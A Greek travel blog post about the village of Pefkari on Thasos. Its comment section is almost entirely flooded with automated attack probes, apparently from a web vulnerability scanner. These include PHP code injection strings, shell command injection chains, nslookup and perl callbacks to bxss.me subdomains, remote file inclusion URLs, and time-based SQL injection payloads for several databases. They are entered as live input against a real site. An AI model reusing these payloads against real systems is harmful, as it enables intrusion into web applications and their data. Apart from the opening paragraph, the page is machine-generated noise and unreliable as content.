Πευκάρι Θάσου

Posted by superadmin 07/05/2019 172 Comment(s)


Το Πευκάρι είναι χωριό της Θάσου. Βρίσκεται στη νότια ακτή του νησιού, ανάμεσα στα χωριά Ποτός και Λιμενάρια, και είναι ένας δημοφιλής τουριστικός προορισμός. Το όνομά του σημαίνει «μικρό πεύκο» στην τοπική διάλεκτο.

172 Comment(s)

lxbfYeaa:
23/02/2022, 12:20:08 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:20:15 AM

1

lxbfYeaa:
23/02/2022, 12:21:14 AM

1

lxbfYeaa:
23/02/2022, 12:23:38 AM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

lxbfYeaa:
23/02/2022, 12:23:42 AM

1some_inexistent_file_with_long_name.jpg

lxbfYeaa:
23/02/2022, 12:23:45 AM

Http://bxss.me/t/fit.txt

lxbfYeaa:
23/02/2022, 12:23:48 AM

http://bxss.me/t/fit.txt?.jpg

lxbfYeaa:
23/02/2022, 12:23:49 AM

1

lxbfYeaa:
23/02/2022, 12:23:50 AM

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

lxbfYeaa:
23/02/2022, 12:23:50 AM

bxss.me

lxbfYeaa:
23/02/2022, 12:23:53 AM

';print(md5(31337));$a='

lxbfYeaa:
23/02/2022, 12:23:56 AM

";print(md5(31337));$a="

lxbfYeaa:
23/02/2022, 12:23:59 AM

${@print(md5(31337))}

lxbfYeaa:
23/02/2022, 12:24:01 AM

echo jkwrmd$()\ kikbni\nz^xyu||a #' &echo jkwrmd$()\ kikbni\nz^xyu||a #|" &echo jkwrmd$()\ kikbni\nz^xyu||a #

lxbfYeaa:
23/02/2022, 12:24:02 AM

${@print(md5(31337))}\

lxbfYeaa:
23/02/2022, 12:24:04 AM

&echo aikdiy$()\ myriuf\nz^xyu||a #' &echo aikdiy$()\ myriuf\nz^xyu||a #|" &echo aikdiy$()\ myriuf\nz^xyu||a #

lxbfYeaa:
23/02/2022, 12:24:05 AM

'.print(md5(31337)).'

lxbfYeaa:
23/02/2022, 12:24:07 AM

|echo oqnelx$()\ kqbjna\nz^xyu||a #' |echo oqnelx$()\ kqbjna\nz^xyu||a #|" |echo oqnelx$()\ kqbjna\nz^xyu||a #

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg:
23/02/2022, 12:24:08 AM

1

lxbfYeaa:
23/02/2022, 12:24:10 AM

(nslookup hitowxtybvfqx4e4bd.bxss.me||perl -e "gethostbyname('hitowxtybvfqx4e4bd.bxss.me')")

1some_inexistent_file_with_long_name.jpg:
23/02/2022, 12:24:11 AM

1

lxbfYeaa:
23/02/2022, 12:24:13 AM

$(nslookup hitztebhsdira358dd.bxss.me||perl -e "gethostbyname('hitztebhsdira358dd.bxss.me')")

Http://bxss.me/t/fit.txt:
23/02/2022, 12:24:14 AM

1

lxbfYeaa:
23/02/2022, 12:24:15 AM

&(nslookup hitxkaqpzdpbleea86.bxss.me||perl -e "gethostbyname('hitxkaqpzdpbleea86.bxss.me')")&'\"`0&(nslookup hitxkaqpzdpbleea86.bxss.me||perl -e "gethostbyname('hitxkaqpzdpbleea86.bxss.me')")&`'

http://bxss.me/t/fit.txt?.jpg:
23/02/2022, 12:24:16 AM

1

lxbfYeaa:
23/02/2022, 12:24:17 AM

|(nslookup hitwuunwmsdqi0d5f4.bxss.me||perl -e "gethostbyname('hitwuunwmsdqi0d5f4.bxss.me')")

bxss.me:
23/02/2022, 12:24:18 AM

1

lxbfYeaa:
23/02/2022, 12:24:20 AM

`(nslookup hitmxbyyxbwsjec184.bxss.me||perl -e "gethostbyname('hitmxbyyxbwsjec184.bxss.me')")`

lxbfYeaa:
23/02/2022, 12:24:23 AM

;(nslookup hitwjnqharozd1bb45.bxss.me||perl -e "gethostbyname('hitwjnqharozd1bb45.bxss.me')")|(nslookup hitwjnqharozd1bb45.bxss.me||perl -e "gethostbyname('hitwjnqharozd1bb45.bxss.me')")&(nslookup hitwjnqharozd1bb45.bxss.me||perl -e "gethostbyname('hitwjnqharozd1bb45.bxss.me')")

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));:
23/02/2022, 12:24:23 AM

1

';print(md5(31337));$a=':
23/02/2022, 12:24:26 AM

1

";print(md5(31337));$a=":
23/02/2022, 12:24:28 AM

1

${@print(md5(31337))}:
23/02/2022, 12:24:31 AM

1

${@print(md5(31337))}\:
23/02/2022, 12:24:34 AM

1

lxbfYeaa:
23/02/2022, 12:24:34 AM

1

'.print(md5(31337)).':
23/02/2022, 12:24:36 AM

1

lxbfYeaa:
23/02/2022, 12:24:36 AM

1

lxbfYeaa:
23/02/2022, 12:24:37 AM

1

lxbfYeaa:
23/02/2022, 12:24:38 AM

1

lxbfYeaa:
23/02/2022, 12:24:41 AM

1

lxbfYeaa:
23/02/2022, 12:24:43 AM

1

echo olbvzi$()\ qchjoz\nz^xyu||a #' &echo olbvzi$()\ qchjoz\nz^xyu||a #|" &echo olbvzi$()\ qchjoz\nz^xyu||a #:
23/02/2022, 12:24:47 AM

1

&echo rczdlt$()\ oxliam\nz^xyu||a #' &echo rczdlt$()\ oxliam\nz^xyu||a #|" &echo rczdlt$()\ oxliam\nz^xyu||a #:
23/02/2022, 12:24:50 AM

1

|echo snxxof$()\ xzrstb\nz^xyu||a #' |echo snxxof$()\ xzrstb\nz^xyu||a #|" |echo snxxof$()\ xzrstb\nz^xyu||a #:
23/02/2022, 12:24:52 AM

1

lxbfYeaa:
23/02/2022, 12:24:53 AM

1

(nslookup hitiyqhumfkeie262f.bxss.me||perl -e "gethostbyname('hitiyqhumfkeie262f.bxss.me')"):
23/02/2022, 12:24:55 AM

1

lxbfYeaa:
23/02/2022, 12:24:56 AM

1

$(nslookup hitzltxyusrww4887c.bxss.me||perl -e "gethostbyname('hitzltxyusrww4887c.bxss.me')"):
23/02/2022, 12:24:58 AM

1

lxbfYeaa:
23/02/2022, 12:24:58 AM

1

&(nslookup hithagqruowarf5d75.bxss.me||perl -e "gethostbyname('hithagqruowarf5d75.bxss.me')")&'\"`0&(nslookup hithagqruowarf5d75.bxss.me||perl -e "gethostbyname('hithagqruowarf5d75.bxss.me')")&`':
23/02/2022, 12:25:00 AM

1

lxbfYeaa:
23/02/2022, 12:25:01 AM

1

|(nslookup hitefpncrnwxff187e.bxss.me||perl -e "gethostbyname('hitefpncrnwxff187e.bxss.me')"):
23/02/2022, 12:25:03 AM

1

lxbfYeaa:
23/02/2022, 12:25:03 AM

1

`(nslookup hitlfmcdhkelv028c2.bxss.me||perl -e "gethostbyname('hitlfmcdhkelv028c2.bxss.me')")`:
23/02/2022, 12:25:05 AM

1

lxbfYeaa:
23/02/2022, 12:25:05 AM

1

;(nslookup hitjsypczxnhi49d83.bxss.me||perl -e "gethostbyname('hitjsypczxnhi49d83.bxss.me')")|(nslookup hitjsypczxnhi49d83.bxss.me||perl -e "gethostbyname('hitjsypczxnhi49d83.bxss.me')")&(nslookup hitjsypczxnhi49d83.bxss.me||perl -e:
23/02/2022, 12:25:06 AM

1

lxbfYeaa:
23/02/2022, 12:25:19 AM

1

lxbfYeaa:
23/02/2022, 12:25:20 AM

1

lxbfYeaa:
23/02/2022, 12:25:22 AM

1

lxbfYeaa:
23/02/2022, 12:25:24 AM

1

lxbfYeaa:
23/02/2022, 12:25:25 AM

1

lxbfYeaa:
23/02/2022, 12:25:27 AM

1

lxbfYeaa:
23/02/2022, 12:25:29 AM

1

lxbfYeaa:
23/02/2022, 12:25:30 AM

1

lxbfYeaa:
23/02/2022, 12:25:32 AM

1

lxbfYeaa:
23/02/2022, 12:31:57 AM

1

lxbfYeaa:
23/02/2022, 12:32:14 AM

1

lxbfYeaa:
23/02/2022, 12:32:36 AM

1

lxbfYeaa:
23/02/2022, 12:32:50 AM

1

lxbfYeaa:
23/02/2022, 12:37:18 AM

1

lxbfYeaa:
23/02/2022, 12:37:51 AM

1

lxbfYeaa:
23/02/2022, 12:37:53 AM

-1 OR 2+564-564-1=0+0+0+1 --

lxbfYeaa:
23/02/2022, 12:37:55 AM

-1 OR 3+564-564-1=0+0+0+1 --

lxbfYeaa:
23/02/2022, 12:37:57 AM

-1 OR 2+143-143-1=0+0+0+1

lxbfYeaa:
23/02/2022, 12:37:59 AM

-1 OR 3+143-143-1=0+0+0+1

lxbfYeaa:
23/02/2022, 12:38:01 AM

-1' OR 2+365-365-1=0+0+0+1 --

lxbfYeaa:
23/02/2022, 12:38:03 AM

-1' OR 3+365-365-1=0+0+0+1 --

lxbfYeaa:
23/02/2022, 12:38:06 AM

-1' OR 2+324-324-1=0+0+0+1 or 'rb2DSJ22'='

lxbfYeaa:
23/02/2022, 12:38:08 AM

-1' OR 3+324-324-1=0+0+0+1 or 'rb2DSJ22'='

lxbfYeaa:
23/02/2022, 12:38:11 AM

-1" OR 2+987-987-1=0+0+0+1 --

lxbfYeaa:
23/02/2022, 12:38:13 AM

-1" OR 3+987-987-1=0+0+0+1 --

lxbfYeaa:
23/02/2022, 12:38:52 AM

if(now()=sysdate(),sleep(15),0)

lxbfYeaa:
23/02/2022, 12:39:25 AM

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

lxbfYeaa:
23/02/2022, 12:39:55 AM

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

lxbfYeaa:
23/02/2022, 12:40:24 AM

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

lxbfYeaa:
23/02/2022, 12:40:51 AM

-1; waitfor delay '0:0:15' --

lxbfYeaa:
23/02/2022, 12:41:23 AM

-1); waitfor delay '0:0:15' --

lxbfYeaa:
23/02/2022, 12:41:51 AM

1 waitfor delay '0:0:15' --

lxbfYeaa:
23/02/2022, 12:42:15 AM

ZvNtb1Cj'; waitfor delay '0:0:15' --

lxbfYeaa:
23/02/2022, 12:42:40 AM

-5 OR 865=(SELECT 865 FROM PG_SLEEP(15))--

lxbfYeaa:
23/02/2022, 12:43:05 AM

-5) OR 748=(SELECT 748 FROM PG_SLEEP(15))--

lxbfYeaa:
23/02/2022, 12:43:30 AM

-1)) OR 763=(SELECT 763 FROM PG_SLEEP(15))--

lxbfYeaa:
23/02/2022, 12:44:01 AM

1xllCr2m' OR 652=(SELECT 652 FROM PG_SLEEP(15))--

lxbfYeaa:
23/02/2022, 12:44:27 AM

SrUu0Qbw') OR 133=(SELECT 133 FROM PG_SLEEP(15))--

lxbfYeaa:
23/02/2022, 12:44:51 AM

YfmUpDQC')) OR 680=(SELECT 680 FROM PG_SLEEP(15))--

lxbfYeaa:
23/02/2022, 12:45:22 AM

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

lxbfYeaa:
23/02/2022, 12:45:51 AM

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

lxbfYeaa:
23/02/2022, 12:45:53 AM

1'"

lxbfYeaa:
23/02/2022, 12:45:56 AM

@@PPakx

lxbfYeaa:
23/02/2022, 12:46:18 AM

1

lxbfYeaa:
23/02/2022, 12:46:38 AM

1

lxbfYeaa:
23/02/2022, 12:49:40 AM

1

lxbfYeaa:
23/02/2022, 12:49:52 AM

1

-1 OR 2+97-97-1=0+0+0+1 --:
23/02/2022, 12:49:53 AM

1

-1 OR 3+97-97-1=0+0+0+1 --:
23/02/2022, 12:49:54 AM

1

-1 OR 2+817-817-1=0+0+0+1:
23/02/2022, 12:49:54 AM

1

-1 OR 3+817-817-1=0+0+0+1:
23/02/2022, 12:49:55 AM

1

-1' OR 2+18-18-1=0+0+0+1 --:
23/02/2022, 12:49:56 AM

1

-1' OR 3+18-18-1=0+0+0+1 --:
23/02/2022, 12:49:57 AM

1

-1' OR 2+44-44-1=0+0+0+1 or 'HO9oJOh5'=':
23/02/2022, 12:49:57 AM

1

-1' OR 3+44-44-1=0+0+0+1 or 'HO9oJOh5'=':
23/02/2022, 12:49:58 AM

1

-1" OR 2+153-153-1=0+0+0+1 --:
23/02/2022, 12:49:59 AM

1

-1" OR 3+153-153-1=0+0+0+1 --:
23/02/2022, 12:49:59 AM

1

if(now()=sysdate(),sleep(15),0):
23/02/2022, 12:50:12 AM

1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z:
23/02/2022, 12:50:24 AM

1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z:
23/02/2022, 12:50:37 AM

1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/:
23/02/2022, 12:50:51 AM

1

1 waitfor delay '0:0:15' --:
23/02/2022, 12:51:07 AM

1

rUEmS9yZ'; waitfor delay '0:0:15' --:
23/02/2022, 12:51:26 AM

1

DrskTyyT' OR 976=(SELECT 976 FROM PG_SLEEP(15))--:
23/02/2022, 12:51:47 AM

1

qc9bFUDs') OR 14=(SELECT 14 FROM PG_SLEEP(15))--:
23/02/2022, 12:52:08 AM

1

OMf9ejYB')) OR 282=(SELECT 282 FROM PG_SLEEP(15))--:
23/02/2022, 12:52:33 AM

1

lxbfYeaa'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||':
23/02/2022, 12:52:57 AM

1

1'":
23/02/2022, 12:52:59 AM

1

@@seElX:
23/02/2022, 12:53:01 AM

1

lxbfYeaa:
23/02/2022, 12:53:30 AM

1

lxbfYeaa:
23/02/2022, 12:53:56 AM

1

lxbfYeaa:
23/02/2022, 12:59:19 AM

1

lxbfYeaa:
23/02/2022, 12:59:32 AM

1

lxbfYeaa:
23/02/2022, 12:59:49 AM

1

lxbfYeaa:
23/02/2022, 01:00:07 AM

1

lxbfYeaa:
23/02/2022, 01:00:08 AM

1

lxbfYeaa:
23/02/2022, 01:00:09 AM

1

lxbfYeaa:
23/02/2022, 01:00:09 AM

1

lxbfYeaa:
23/02/2022, 01:00:10 AM

1

lxbfYeaa:
23/02/2022, 01:00:10 AM

1

lxbfYeaa:
23/02/2022, 01:00:11 AM

1

lxbfYeaa:
23/02/2022, 01:00:12 AM

1

lxbfYeaa:
23/02/2022, 01:00:13 AM

1

lxbfYeaa:
23/02/2022, 01:00:14 AM

1

lxbfYeaa:
23/02/2022, 01:00:15 AM

1

lxbfYeaa:
23/02/2022, 01:00:27 AM

1

lxbfYeaa:
23/02/2022, 01:00:42 AM

1

lxbfYeaa:
23/02/2022, 01:00:58 AM

1

lxbfYeaa:
23/02/2022, 01:01:10 AM

1

lxbfYeaa:
23/02/2022, 01:01:22 AM

1

lxbfYeaa:
23/02/2022, 01:01:35 AM

1

lxbfYeaa:
23/02/2022, 01:01:47 AM

1

lxbfYeaa:
23/02/2022, 01:01:59 AM

1

lxbfYeaa:
23/02/2022, 01:02:12 AM

1

lxbfYeaa:
23/02/2022, 01:02:24 AM

1

lxbfYeaa:
23/02/2022, 01:02:25 AM

1

lxbfYeaa:
23/02/2022, 01:02:26 AM

1

lxbfYeaa:
23/02/2022, 01:02:26 AM

1

lxbfYeaa:
23/02/2022, 01:22:44 AM

1

lxbfYeaa:
23/02/2022, 12:22:39 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:22:53 AM, www.vulnweb.com
Reply

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

lxbfYeaa:
23/02/2022, 12:22:57 AM, www.vulnweb.com
Reply

1some_inexistent_file_with_long_name.jpg

lxbfYeaa:
23/02/2022, 12:23:00 AM, www.vulnweb.com
Reply

Http://bxss.me/t/fit.txt

lxbfYeaa:
23/02/2022, 12:23:04 AM, www.vulnweb.com
Reply

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

lxbfYeaa:
23/02/2022, 12:23:04 AM, www.vulnweb.com
Reply

http://bxss.me/t/fit.txt?.jpg

lxbfYeaa:
23/02/2022, 12:23:07 AM, www.vulnweb.com
Reply

';print(md5(31337));$a='

lxbfYeaa:
23/02/2022, 12:23:07 AM, www.vulnweb.com
Reply

bxss.me

lxbfYeaa:
23/02/2022, 12:23:10 AM, www.vulnweb.com
Reply

";print(md5(31337));$a="

lxbfYeaa:
23/02/2022, 12:23:14 AM, www.vulnweb.com
Reply

${@print(md5(31337))}

lxbfYeaa:
23/02/2022, 12:23:17 AM, www.vulnweb.com
Reply

${@print(md5(31337))}\

lxbfYeaa:
23/02/2022, 12:23:20 AM, www.vulnweb.com
Reply

echo twjuek$()\ lwdgqt\nz^xyu||a #' &echo twjuek$()\ lwdgqt\nz^xyu||a #|" &echo twjuek$()\ lwdgqt\nz^xyu||a #

lxbfYeaa:
23/02/2022, 12:23:20 AM, www.vulnweb.com
Reply

'.print(md5(31337)).'

lxbfYeaa:
23/02/2022, 12:23:23 AM, www.vulnweb.com
Reply

&echo sbkbqm$()\ tucejg\nz^xyu||a #' &echo sbkbqm$()\ tucejg\nz^xyu||a #|" &echo sbkbqm$()\ tucejg\nz^xyu||a #

lxbfYeaa:
23/02/2022, 12:23:26 AM, www.vulnweb.com
Reply

|echo mqxssu$()\ cwrkvi\nz^xyu||a #' |echo mqxssu$()\ cwrkvi\nz^xyu||a #|" |echo mqxssu$()\ cwrkvi\nz^xyu||a #

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg:
23/02/2022, 12:23:27 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:23:29 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:23:30 AM, www.vulnweb.com
Reply

(nslookup hiterdvpzzzlo20565.bxss.me||perl -e "gethostbyname('hiterdvpzzzlo20565.bxss.me')")

1some_inexistent_file_with_long_name.jpg:
23/02/2022, 12:23:31 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:23:33 AM, www.vulnweb.com
Reply

$(nslookup hitniyuwuclew6aa5c.bxss.me||perl -e "gethostbyname('hitniyuwuclew6aa5c.bxss.me')")

Http://bxss.me/t/fit.txt:
23/02/2022, 12:23:34 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:23:37 AM, www.vulnweb.com
Reply

&(nslookup hituhpuzsmobjb1055.bxss.me||perl -e "gethostbyname('hituhpuzsmobjb1055.bxss.me')")&'\"`0&(nslookup hituhpuzsmobjb1055.bxss.me||perl -e "gethostbyname('hituhpuzsmobjb1055.bxss.me')")&`'

http://bxss.me/t/fit.txt?.jpg:
23/02/2022, 12:23:38 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:23:40 AM, www.vulnweb.com
Reply

|(nslookup hitsavvbfldht1301e.bxss.me||perl -e "gethostbyname('hitsavvbfldht1301e.bxss.me')")

bxss.me:
23/02/2022, 12:23:41 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:23:44 AM, www.vulnweb.com
Reply

`(nslookup hitwtsjjcspuqb2000.bxss.me||perl -e "gethostbyname('hitwtsjjcspuqb2000.bxss.me')")`

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));:
23/02/2022, 12:23:44 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:23:47 AM, www.vulnweb.com
Reply

;(nslookup hitubmuajktsi328b6.bxss.me||perl -e "gethostbyname('hitubmuajktsi328b6.bxss.me')")|(nslookup hitubmuajktsi328b6.bxss.me||perl -e "gethostbyname('hitubmuajktsi328b6.bxss.me')")&(nslookup hitubmuajktsi328b6.bxss.me||perl -e "gethostbyname('hitubmuajktsi328b6.bxss.me')")

';print(md5(31337));$a=':
23/02/2022, 12:23:47 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
Reply

e

";print(md5(31337));$a=":
23/02/2022, 12:23:50 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:23:50 AM, Http://bxss.me/t/fit.txt
Reply

e

${@print(md5(31337))}:
23/02/2022, 12:23:52 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:23:53 AM, bxss.me/t/fit.txt?.com
Reply

e

${@print(md5(31337))}\:
23/02/2022, 12:23:56 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:23:56 AM, bxss.me
Reply

e

'.print(md5(31337)).':
23/02/2022, 12:23:59 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
Reply

e

lxbfYeaa:
23/02/2022, 12:24:05 AM, ';print(md5(31337));$a='
Reply

e

lxbfYeaa:
23/02/2022, 12:24:08 AM, ";print(md5(31337));$a="
Reply

e

lxbfYeaa:
23/02/2022, 12:24:10 AM, ${@print(md5(31337))}
Reply

e

lxbfYeaa:
23/02/2022, 12:24:13 AM, ${@print(md5(31337))}\
Reply

e

echo chkzve$()\ pymbxj\nz^xyu||a #' &echo chkzve$()\ pymbxj\nz^xyu||a #|" &echo chkzve$()\ pymbxj\nz^xyu||a #:
23/02/2022, 12:24:15 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:24:15 AM, '.print(md5(31337)).'
Reply

e

&echo qcbfsw$()\ bxnabg\nz^xyu||a #' &echo qcbfsw$()\ bxnabg\nz^xyu||a #|" &echo qcbfsw$()\ bxnabg\nz^xyu||a #:
23/02/2022, 12:24:18 AM, www.vulnweb.com
Reply

e

|echo hfquyk$()\ vledbw\nz^xyu||a #' |echo hfquyk$()\ vledbw\nz^xyu||a #|" |echo hfquyk$()\ vledbw\nz^xyu||a #:
23/02/2022, 12:24:20 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:24:21 AM, www.vulnweb.com
Reply

1

(nslookup hititrqlgptnlc21c8.bxss.me||perl -e "gethostbyname('hititrqlgptnlc21c8.bxss.me')"):
23/02/2022, 12:24:23 AM, www.vulnweb.com
Reply

e

$(nslookup hitkygbgseeag413df.bxss.me||perl -e "gethostbyname('hitkygbgseeag413df.bxss.me')"):
23/02/2022, 12:24:25 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:24:26 AM, www.vulnweb.com
Reply

1

&(nslookup hitxotwoejzja50bd3.bxss.me||perl -e "gethostbyname('hitxotwoejzja50bd3.bxss.me')")&'\"`0&(nslookup hitxotwoejzja50bd3.bxss.me||perl -e "gethostbyname('hitxotwoejzja50bd3.bxss.me')")&`':
23/02/2022, 12:24:28 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:24:29 AM, www.vulnweb.com
Reply

1

|(nslookup hittckhwvlmdz8b84f.bxss.me||perl -e "gethostbyname('hittckhwvlmdz8b84f.bxss.me')"):
23/02/2022, 12:24:30 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:24:31 AM, www.vulnweb.com
Reply

1

`(nslookup hitfxhulvbuqp2caec.bxss.me||perl -e "gethostbyname('hitfxhulvbuqp2caec.bxss.me')")`:
23/02/2022, 12:24:33 AM, www.vulnweb.com
Reply

e

;(nslookup hitpltylvxbqse83d9.bxss.me||perl -e "gethostbyname('hitpltylvxbqse83d9.bxss.me')")|(nslookup hitpltylvxbqse83d9.bxss.me||perl -e "gethostbyname('hitpltylvxbqse83d9.bxss.me')")&(nslookup hitpltylvxbqse83d9.bxss.me||perl -e:
23/02/2022, 12:24:35 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:24:38 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:24:41 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:24:43 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:24:46 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:24:48 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:24:51 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:25:08 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:25:10 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:25:11 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:25:13 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:25:14 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:25:14 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:25:15 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:25:17 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:25:18 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:31:27 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:31:48 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:32:11 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:32:28 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:36:34 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:37:10 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:37:11 AM, www.vulnweb.com
Reply

-1 OR 2+138-138-1=0+0+0+1 --

lxbfYeaa:
23/02/2022, 12:37:13 AM, www.vulnweb.com
Reply

-1 OR 3+138-138-1=0+0+0+1 --

lxbfYeaa:
23/02/2022, 12:37:15 AM, www.vulnweb.com
Reply

-1 OR 2+787-787-1=0+0+0+1

lxbfYeaa:
23/02/2022, 12:37:16 AM, www.vulnweb.com
Reply

-1 OR 3+787-787-1=0+0+0+1

lxbfYeaa:
23/02/2022, 12:37:18 AM, www.vulnweb.com
Reply

-1' OR 2+861-861-1=0+0+0+1 --

lxbfYeaa:
23/02/2022, 12:37:19 AM, www.vulnweb.com
Reply

-1' OR 3+861-861-1=0+0+0+1 --

lxbfYeaa:
23/02/2022, 12:37:21 AM, www.vulnweb.com
Reply

-1' OR 2+150-150-1=0+0+0+1 or 'I5b6x7v2'='

lxbfYeaa:
23/02/2022, 12:37:23 AM, www.vulnweb.com
Reply

-1' OR 3+150-150-1=0+0+0+1 or 'I5b6x7v2'='

lxbfYeaa:
23/02/2022, 12:37:24 AM, www.vulnweb.com
Reply

-1" OR 2+104-104-1=0+0+0+1 --

lxbfYeaa:
23/02/2022, 12:37:26 AM, www.vulnweb.com
Reply

-1" OR 3+104-104-1=0+0+0+1 --

lxbfYeaa:
23/02/2022, 12:38:02 AM, www.vulnweb.com
Reply

if(now()=sysdate(),sleep(15),0)

lxbfYeaa:
23/02/2022, 12:38:41 AM, www.vulnweb.com
Reply

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

lxbfYeaa:
23/02/2022, 12:39:18 AM, www.vulnweb.com
Reply

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

lxbfYeaa:
23/02/2022, 12:39:49 AM, www.vulnweb.com
Reply

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

lxbfYeaa:
23/02/2022, 12:40:18 AM, www.vulnweb.com
Reply

1 waitfor delay '0:0:15' --

lxbfYeaa:
23/02/2022, 12:40:48 AM, www.vulnweb.com
Reply

L9SHpTEz'; waitfor delay '0:0:15' --

lxbfYeaa:
23/02/2022, 12:41:19 AM, www.vulnweb.com
Reply

kvkw3Dh5' OR 961=(SELECT 961 FROM PG_SLEEP(15))--

lxbfYeaa:
23/02/2022, 12:41:47 AM, www.vulnweb.com
Reply

IqbX6o0m') OR 552=(SELECT 552 FROM PG_SLEEP(15))--

lxbfYeaa:
23/02/2022, 12:42:10 AM, www.vulnweb.com
Reply

KnTLNuZ3')) OR 102=(SELECT 102 FROM PG_SLEEP(15))--

lxbfYeaa:
23/02/2022, 12:42:37 AM, www.vulnweb.com
Reply

e'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

lxbfYeaa:
23/02/2022, 12:42:38 AM, www.vulnweb.com
Reply

1'"

lxbfYeaa:
23/02/2022, 12:42:40 AM, www.vulnweb.com
Reply

@@pRqVr

lxbfYeaa:
23/02/2022, 12:43:04 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:43:29 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:47:56 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:48:11 AM, www.vulnweb.com
Reply

e

-1 OR 2+162-162-1=0+0+0+1 --:
23/02/2022, 12:48:12 AM, www.vulnweb.com
Reply

e

-1 OR 3+162-162-1=0+0+0+1 --:
23/02/2022, 12:48:13 AM, www.vulnweb.com
Reply

e

-1 OR 2+31-31-1=0+0+0+1:
23/02/2022, 12:48:13 AM, www.vulnweb.com
Reply

e

-1 OR 3+31-31-1=0+0+0+1:
23/02/2022, 12:48:14 AM, www.vulnweb.com
Reply

e

-1' OR 2+244-244-1=0+0+0+1 --:
23/02/2022, 12:48:15 AM, www.vulnweb.com
Reply

e

-1' OR 3+244-244-1=0+0+0+1 --:
23/02/2022, 12:48:16 AM, www.vulnweb.com
Reply

e

-1' OR 2+440-440-1=0+0+0+1 or 'in90PYEM'=':
23/02/2022, 12:48:17 AM, www.vulnweb.com
Reply

e

-1' OR 3+440-440-1=0+0+0+1 or 'in90PYEM'=':
23/02/2022, 12:48:18 AM, www.vulnweb.com
Reply

e

-1" OR 2+870-870-1=0+0+0+1 --:
23/02/2022, 12:48:19 AM, www.vulnweb.com
Reply

e

-1" OR 3+870-870-1=0+0+0+1 --:
23/02/2022, 12:48:20 AM, www.vulnweb.com
Reply

e

if(now()=sysdate(),sleep(15),0):
